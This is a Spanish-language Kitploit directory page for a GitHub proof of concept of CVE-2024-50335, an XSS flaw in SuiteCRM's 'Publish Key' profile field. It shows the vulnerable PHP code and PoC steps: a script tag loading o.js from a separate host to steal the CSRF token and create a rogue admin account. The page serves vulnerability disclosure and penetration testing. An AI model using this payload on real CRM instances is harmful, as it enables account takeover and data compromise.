Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-50335 — Una vulnerabilidad de seguridad en SuiteCRM que puede explotarse para robar tokens CSRF y realizar acciones no autorizadas, como crear nuevos usuarios administrativos sin la autenticación adecuada. | Kitploit
Herramientas/GitHubGitHub/shellkraft/cve-2024-50335
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubshellkraft/cve-2024-50335

CVE-2024-50335

Una vulnerabilidad de seguridad en SuiteCRM que puede explotarse para robar tokens CSRF y realizar acciones no autorizadas, como crear nuevos usuarios administrativos sin la autenticación adecuada.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-50335: XSS autenticado en el campo "Publish Key" que permite la creación no autorizada de usuarios administradores

Resumen

El campo "Publish Key" en la página Edit Profile de SuiteCRM es vulnerable a Cross-Site Scripting Reflejado (XSS), lo que permite a un atacante inyectar código JavaScript malicioso. Esto puede explotarse para robar tokens CSRF y realizar acciones no autorizadas, como crear nuevos usuarios administradores sin la autenticación adecuada.


Detalles

La vulnerabilidad surge debido a una validación y saneamiento insuficientes de la entrada del campo Publish Key dentro de la aplicación SuiteCRM. Cuando un atacante inyecta un script malicioso, este se ejecuta en el contexto de la sesión de un usuario autenticado. El script inyectado (o.js) aprovecha entonces el token CSRF capturado para forjar solicitudes que crean nuevos usuarios administradores, comprometiendo efectivamente la integridad y la seguridad de la instancia del CRM.


Impacto

Esta vulnerabilidad es un problema crítico de Cross-Site Scripting (XSS). Su impacto incluye:

  1. Acceso administrativo no autorizado: Un atacante puede crear nuevos usuarios administradores, obteniendo potencialmente el control total de la instancia del CRM.
  2. Robo de tokens CSRF: Permite realizar acciones no autorizadas en nombre de usuarios autenticados.
  3. Compromiso de la integridad de los datos: La capacidad de manipular cuentas de usuario y ajustes puede provocar pérdida de datos, fugas o modificaciones no autorizadas.

Código fuente PHP vulnerable

root@kitploit:~
$publish_key = $this->bean->getPreference('calendar_publish_key');
$this->ss->assign('CALENDAR_PUBLISH_KEY', $publish_key);

$publish_url = $sugar_config['site_url'] . '/vcal_server.php';
$token = "/";

$publish_url .= $token . "type=vfb&source=outlook&key=<span id=\"cal_pub_key_span\">$publish_key</span>";
$ical_url = $sugar_config['site_url'] . "/ical_server.php?type=ics&key=<span id=\"ical_pub_key_span\">$publish_key</span>";

$this->ss->assign("CALENDAR_PUBLISH_URL", $publish_url);
$this->ss->assign("CALENDAR_ICAL_URL", $ical_url);

PoC

  1. Inicie sesión en SuiteCRM utilizando credenciales de Administrador válidas.
  2. Navegue a Edit Profile: Acceda a la página Edit Profile de la cuenta de Administrador.
  3. En el campo "Publish Key" de la pestaña Advanced, inyecte el siguiente script:
root@kitploit:~
<script src=//localhost:1235/o.js>
  1. Asegúrese de que o.js esté alojado en un servidor en localhost en el puerto 1235, sirviendo el código de explotación como se describe en el fragmento de código JavaScript proporcionado.
  2. Guarde los cambios en el perfil de Administrador.
  3. Al recargar la página de SuiteCRM, el script malicioso o.js se ejecuta, robando el token CSRF y usándolo para crear un nuevo usuario administrador con las siguientes credenciales.
root@kitploit:~
Username - imposter
Password - ok
  1. Inicie sesión con las credenciales del nuevo usuario administrador creado para verificar la explotación exitosa.

https://github.com/user-attachments/assets/cdf96f3d-7f61-4371-818b-e344efdcd197


Referencia

  • https://nvd.nist.gov/vuln/detail/CVE-2024-50335
  • https://github.com/salesagility/SuiteCRM/security/advisories/GHSA-8rw6-g96j-3w7m
Descargar herramienta